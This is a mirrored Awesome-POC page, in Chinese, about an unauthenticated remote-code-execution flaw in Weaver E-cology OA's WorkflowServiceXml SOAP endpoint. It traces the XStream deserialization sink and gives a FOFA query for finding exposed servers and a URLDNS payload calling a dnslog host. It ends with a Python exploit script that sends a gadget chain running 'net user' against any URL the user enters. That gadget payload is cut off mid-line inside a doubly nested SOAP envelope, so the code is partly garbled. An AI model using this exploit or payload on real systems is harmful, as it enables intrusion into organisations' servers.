mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
173 lines
46 KiB
Markdown
173 lines
46 KiB
Markdown
|
# 泛微OA WorkflowServiceXml RCE
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
泛微E-cology OA系统的WorkflowServiceXml接口可被未授权访问,攻击者调用该接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程代码执行
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
E-cology <= 9.0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## FOFA
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
app="泛微-协同办公OA"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
漏洞原理来源
|
|||
|
|
|
|||
|
|
https://www.anquanke.com/post/id/239865
|
|||
|
|
|
|||
|
|
根据流量可以得知路由为`/services%20/WorkflowServiceXml`,我随即查看了该OA的web.xml。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
发现了相关类为`weaver.workflow.webservices.WorkflowServiceXml`、`weaver.workflow.webservices.WorkflowServiceImplXml`。
|
|||
|
|
关于类的东西先放到一旁,毕竟路由是否真实存在、`%20`有什么意义才是重点。我开始验证路由的存在。这里我测试了两个版本。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
带上`%20`试试
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
根据这个response可以看出这应该是一个soap xml注入,具体是XMLDecoder、XStream或者其他什么,还得看`weaver.workflow.webservices.WorkflowServiceXml`、`weaver.workflow.webservices.WorkflowServiceImplXml`.
|
|||
|
|
首先,先看看`weaver.workflow.webservices.WorkflowServiceXml`
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
可以注意到这是一个接口类,其中一个方法`doCreateWorkflowRequest`比较可疑。
|
|||
|
|
|
|||
|
|
去`weaver.workflow.webservices.WorkflowServiceImplXml`看看这个方法的实现。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
继续跟踪看看
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
这个xs咋看起来这么眼熟?看看xs是个啥,一般Java可能会定义在代码文件最上方。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
原来xs是`XStream`的对象
|
|||
|
|
|
|||
|
|
既然决定了sink点,下一步肯定是POC的撰写了,先确定SOAP基本模板。
|
|||
|
|
根据朋友给的流量可以确定基本SOAP消息体模板大致是这样的。
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
|
|||
|
|
<soapenv:Header/>
|
|||
|
|
<soapenv:Body>
|
|||
|
|
<web:doCreateWorkflowRequest>
|
|||
|
|
<web:string></web:string>
|
|||
|
|
<web:string>2</web:string>
|
|||
|
|
</web:doCreateWorkflowRequest>
|
|||
|
|
</soapenv:Body>
|
|||
|
|
</soapenv:Envelope>
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
验证成功。
|
|||
|
|
接下来就是寻找gadget了。
|
|||
|
|
由于并没有完整源码,只有部分github源码,不能确定gadget,先使用URLDNS试试。
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
<map>
|
|||
|
|
<entry>
|
|||
|
|
<url>http://1xsz12.dnslog.cn</url>
|
|||
|
|
<string>http://1xsz12.dnslog.cn</string>
|
|||
|
|
</entry>
|
|||
|
|
</map>
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
组合我们的模板试试。
|
|||
|
|
这里涉及到实体编码问题,作为懒人直接选择整体编码算了。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
随后dnslog成功收到请求。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
## 漏洞POC
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
#!/usr/bin/python3
|
|||
|
|
#-*- coding:utf-8 -*-
|
|||
|
|
# author : PeiQi
|
|||
|
|
# from : http://wiki.peiqi.tech
|
|||
|
|
|
|||
|
|
import base64
|
|||
|
|
import requests
|
|||
|
|
import random
|
|||
|
|
import re
|
|||
|
|
import json
|
|||
|
|
import sys
|
|||
|
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|||
|
|
|
|||
|
|
def title():
|
|||
|
|
print('+------------------------------------------')
|
|||
|
|
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
|
|||
|
|
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
|
|||
|
|
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
|
|||
|
|
print('+ \033[34mVersion: 泛微E-Cology WorkflowServiceXml RCE \033[0m')
|
|||
|
|
print('+ \033[36m使用格式: python3 poc.py \033[0m')
|
|||
|
|
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
|
|||
|
|
print('+------------------------------------------')
|
|||
|
|
|
|||
|
|
def POC_1(target_url):
|
|||
|
|
vuln_url = target_url + "/services%20/WorkflowServiceXml"
|
|||
|
|
cmd = "net user"
|
|||
|
|
headers = {
|
|||
|
|
'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
|
|||
|
|
'SOAPAction': '""',
|
|||
|
|
'Cmd': cmd,
|
|||
|
|
"Content-Type": "text/xml;charset=UTF-8"
|
|||
|
|
}
|
|||
|
|
data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
|
|||
|
|
<soapenv:Header/>
|
|||
|
|
<soapenv:Body>
|
|||
|
|
<web:doCreateWorkflowRequest> <web:string>
|
|||
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
|
|||
|
|
<soapenv:Header/>
|
|||
|
|
<soapenv:Body>
|
|||
|
|
<web:doCreateWorkflowRequest> <web:string>
|
|||
|
|
<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$Na
|
|||
|
|
<web:string>2</web:string>
|
|||
|
|
</web:doCreateWorkflowRequest>
|
|||
|
|
</soapenv:Body>
|
|||
|
|
</soapenv:Envelope>'''.format(cmd=cmd)
|
|||
|
|
try:
|
|||
|
|
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|||
|
|
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
|
|||
|
|
if "VulTest" in response.text and response.status_code == 500:
|
|||
|
|
print("\033[36m[o] 存在漏洞 \n[o] 响应为:\n{} \033[0m".format(response.text))
|
|||
|
|
except Exception as e:
|
|||
|
|
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
|
|||
|
|
sys.exit(0)
|
|||
|
|
|
|||
|
|
if __name__ == '__main__':
|
|||
|
|
title()
|
|||
|
|
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
|
|||
|
|
POC_1(target_url)
|
|||
|
|
```
|